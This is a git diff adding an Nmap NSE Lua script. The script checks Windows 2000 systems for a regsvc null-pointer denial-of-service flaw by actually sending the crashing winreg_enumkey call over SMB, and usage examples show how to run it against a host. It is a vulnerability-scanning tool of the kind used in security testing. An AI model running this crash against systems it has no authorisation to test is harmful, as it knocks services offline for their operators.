1 files changed, 124 insertions, 0 deletions
diff --git a/scripts/smb-vuln-regsvc-dos.nse b/scripts/smb-vuln-regsvc-dos.nse
new file mode 100644
index 0000000..4b523e7
--- /dev/null
+++ b/scripts/smb-vuln-regsvc-dos.nse
@@ -0,0 +1,124 @@
+local msrpc = require "msrpc"
+local smb = require "smb"
+local vulns = require "vulns"
+
+description = [[
+Checks if a Microsoft Windows 2000 system is vulnerable to a crash in regsvc caused by a null pointer
+dereference. This check will crash the service if it is vulnerable and requires a guest account or
+higher to work.
+
+The vulnerability was discovered by Ron Bowes while working on <code>smb-enum-sessions</code> and
+was reported to Microsoft (Case #MSRC8742).
+
+This check was previously part of smb-check-vulns.
+]]
+---
+--@usage
+-- nmap --script smb-vuln-regsvc-dos.nse -p445 <host>
+-- nmap -sU --script smb-vuln-regsvc-dos.nse -p U:137,T:139 <host>
+--
+--@output
+--| smb-vuln-regsvc-dos:
+--|   VULNERABLE:
+--|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
+--|     State: VULNERABLE
+--|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
+--|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
+--|       while working on smb-enum-sessions.
+--|_
+---
+
+author = {"Ron Bowes", "Jiayi Ye", "Paulino Calderon <calderon()websec.mx>"}
+copyright = "Ron Bowes"
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = {"intrusive","exploit","dos","vuln"}
+-- run after all smb-* scripts (so if it DOES crash something, it doesn't kill
+-- other scans have had a chance to run)
+dependencies = {
+  "smb-brute", "smb-enum-sessions", "smb-security-mode",
+  "smb-enum-shares", "smb-server-stats",
+  "smb-enum-domains", "smb-enum-users", "smb-system-info",
+  "smb-enum-groups", "smb-os-discovery", "smb-enum-processes",
+  "smb-psexec",
+};
+
+hostrule = function(host)
+  return smb.get_port(host) ~= nil
+end
+
+local VULNERABLE = 1
+local PATCHED    = 2
+
+---While writing <code>smb-enum-sessions</code> I discovered a repeatable null-pointer dereference
+-- in regsvc. I reported it to Microsoft, but because it's a simple DoS (and barely even that, because
+-- the service automatically restarts), and because it's only in Windows 2000, it isn't likely that they'll
+-- fix it. This function checks for that crash (by crashing the process).
+--
+-- The crash occurs when the string sent to winreg_enumkey() function is null.
+--
+--@param host The host object.
+--@return (status, result) If status is false, result is an error code; otherwise, result is either
+--        <code>VULNERABLE</code> for vulnerable or <code>PATCHED</code> for not vulnerable.
+function check_winreg_Enum_crash(host)
+  local i, j
+  local elements = {}
+  local status, bind_result, smbstate
+
+  -- Create the SMB session
+  status, smbstate = msrpc.start_smb(host, msrpc.WINREG_PATH)
+  if(status == false) then
+    return false, smbstate
+  end
+
+  -- Bind to WINREG service
+  status, bind_result = msrpc.bind(smbstate, msrpc.WINREG_UUID, msrpc.WINREG_VERSION, nil)
+  if(status == false) then
+    msrpc.stop_smb(smbstate)
+    return false, bind_result
+  end
+
+  local openhku_result
+  status, openhku_result = msrpc.winreg_openhku(smbstate)
+  if(status == false) then
+    msrpc.stop_smb(smbstate)
+    return false, openhku_result
+  end
+
+  -- Loop through the keys under HKEY_USERS and grab the names
+  local enumkey_result
+  status, enumkey_result = msrpc.winreg_enumkey(smbstate, openhku_result['handle'], 0, nil)
+  msrpc.stop_smb(smbstate)
+
+  if(status == false) then
+    return true, VULNERABLE
+  end
+  return true, PATCHED
+end
+
+action = function(host)
+  local status, result, message
+  local response = {}
+  local vuln_report = vulns.Report:new(SCRIPT_NAME, host)
+  local vuln_table = {
+    title = 'Service regsvc in Microsoft Windows systems vulnerable to denial of service',
+    state = vulns.STATE.NOT_VULN,
+    description = [[
+The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
+pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
+while working on smb-enum-sessions.
+    ]]
+  }
+
+  -- Check for a winreg_Enum crash
+  status, result = check_winreg_Enum_crash(host)
+  if(status == false) then
+    vuln_table.state = vulns.STATE.NOT_VULN
+  else
+    if(result == VULNERABLE) then
+      vuln_table.state = vulns.STATE.VULN
+   else
+      vuln_table.state = vulns.STATE.NOT_VULN
+    end
+  end
+  return vuln_report:make_output(vuln_table)
+end